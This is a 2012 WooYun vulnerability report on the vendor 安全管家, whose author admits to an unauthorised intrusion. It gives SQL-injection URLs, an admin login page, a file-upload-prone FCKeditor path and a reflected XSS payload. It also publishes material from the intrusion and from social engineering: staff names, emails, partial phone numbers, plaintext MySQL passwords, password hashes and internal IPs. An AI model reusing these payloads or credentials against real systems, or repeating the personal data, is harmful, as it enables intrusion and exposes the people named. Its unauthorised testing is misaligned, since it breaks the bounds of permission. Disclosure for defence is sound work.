当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014415

漏洞标题:安全管家主站+子站root注入遇到数据库服务器+XSS+社工杀进邮箱和后台

相关厂商:安全管家

漏洞作者: Seay

提交时间:2012-11-06 12:02

修复时间:2012-12-21 12:03

公开时间:2012-12-21 12:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-06: 细节已通知厂商并且等待厂商处理中
2012-11-06: 厂商已经确认,细节仅向厂商公开
2012-11-16: 细节向核心白帽子及相关领域专家公开
2012-11-26: 细节向普通白帽子公开
2012-12-06: 细节向实习白帽子公开
2012-12-21: 细节向公众公开

简要描述:

首先对安全管家道歉:在未经授权的情况下对安全管家站点进行渗透测试,过程中用到社工,利用得到的数据登陆邮箱和多个后台,对不住
了,对不住+n(对不住)....
感谢好基友Snow。
祝自己在两个月离校后,找到好工作,年后工作顺利。

详细说明:

不一一道来测试过程了,给出得到的数据,为了此漏洞公开后不影响安全管家部分人员的隐私,密码和手机号等敏感信息部分以星号代替。
三处root注入:
http://m.aqgj.cn/wap/?a=header&from=&h=5&t=x&mcid=10
http://m.aqgj.cn/wap/?m=Soft&t=x&mid=103&stid=13
http://www.anguanjia.com/index.php?c=android&a=android_info&act=m&pname=1401
http://m.aqgj.cn/admin/index.php/Public/login 后台
http://aapp.aqgj.cn/m/fckeditor/editor/fckeditor.html php 2.6版本fckeditor编辑器未处理,2.6.4以下版本有个任意文件上传
XSS:
http://www.aqgj.cn/?c=android&act=--%3E%27%22%3E%3Cscript%3Ealert%28/seay/%29%3C/script%3E
社工得到的信息:

赵岗
rainswallow
Rain** [email protected]
Rain**E5
Email:[email protected][email protected][email protected]/[email protected]
whios:
anquanguanjia.com [email protected]
rainswallow Rain** [email protected]
http://www.1tpan.com/
[email protected] Rain**


服务器管理员

stoneslshi
Email:[email protected][email protected]
pass:82**17/stone**shi/
管理:[email protected];
> 赵岗
> 手机:139108372**
叶纪平
手机: 1870101800**
谢滋
TEL:151200726**
-------------------------------------------------------------------------------------
bbs:
tangcan stones**hi
--------------------------------------------------------------------------------------
web:
admin ruan**e2610
---------------------------------------------------------------------------------------
mysql:
repl repl
root mqq2009
dbuser softdb123
---------------------------------------------------------------------------------------


注入得到的信息:

Target: 		http://m.aqgj.cn/wap/?a=header&from=&h=5&t=x&mcid=10
Host IP: 117.135.130.111
Web Server: nginx/0.9.3
Powered-by: PHP/5.3.10
DB Server: MySQL
Resp. Time(avg): 187 ms
Current User: [email protected]
Sql Version: 5.0.51a-log
Current DB: wap
System User: [email protected]
Host Name: 21_18
Installation dir: /usr/local/app/mysql-linux/
DB User & Pass: root::localhost
root::21_18
root::127.0.0.1
::localhost
::21_18
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:172.23.%
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:172.25.%
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:172.27.%
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:10.161.%
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:10.130.%
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:10.147.%
repl:*A424E797037BF97C19A2E88CF7891C5C2038C039:10.147.%
dbuser:*8A47F8BB72BDAFAB6BD74D0A984DABE184C19915:%
Data Bases: information_schema
aqgj
mysql
nwww
scandb
softdb
test
ucdb
user
wap
www
x2
Target: http://www.anguanjia.com/index.php?c=android&a=android_info&act=m&pname=1401
Host IP: 211.162.209.90
Web Server: nginx/0.9.3
Powered-by: PHP/5.3.10
DB Server: MySQL >=5
Resp. Time(avg): 256 ms
Current User: [email protected]
Sql Version: 5.0.51a-log
Current DB: softdbm
System User: [email protected]
Host Name: 20_76
Installation dir: /usr/local/app/mysql-linux/
DB User & Pass: root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:localhost
root::20_76
root::127.0.0.1
::localhost
::20_76
repl:*A424E797037BF97C19A2E88CF7891C5C2038C039:10.147.19.237
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:10.147.19.237
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:10.147.20.76
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:10.147.20.80
root:*1FEF85324A865F1E4370692C04F76CA2A013CD47:10.147.20.79
dbuser:*8A47F8BB72BDAFAB6BD74D0A984DABE184C19915:*
dbuser:*8A47F8BB72BDAFAB6BD74D0A984DABE184C19915:%
root:*0BAAC73C3E8A726A89A9C282B1444736CE2569C4:10.147.20.81
Data Bases: information_schema
backupdb
cloudscandb
cloudtj
mysql
softdbi
softdbm
test

漏洞证明:

1.jpg


2.jpg


3.jpg


4.jpg

修复方案:

再次对安全管家说声对不住,请原谅此次的未授权测试。
修复下注入。
尽快修改下以前用到的密码。
数据库连接尽量不要用root权限。
顺便求礼物鼓励,感谢安全管家。

版权声明:转载请注明来源 Seay@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-11-06 13:24

厂商回复:

收到,已经在处理

最新状态:

2012-11-14:已经处理完毕,消除漏洞

2012-11-14:已经处理完毕,消除漏洞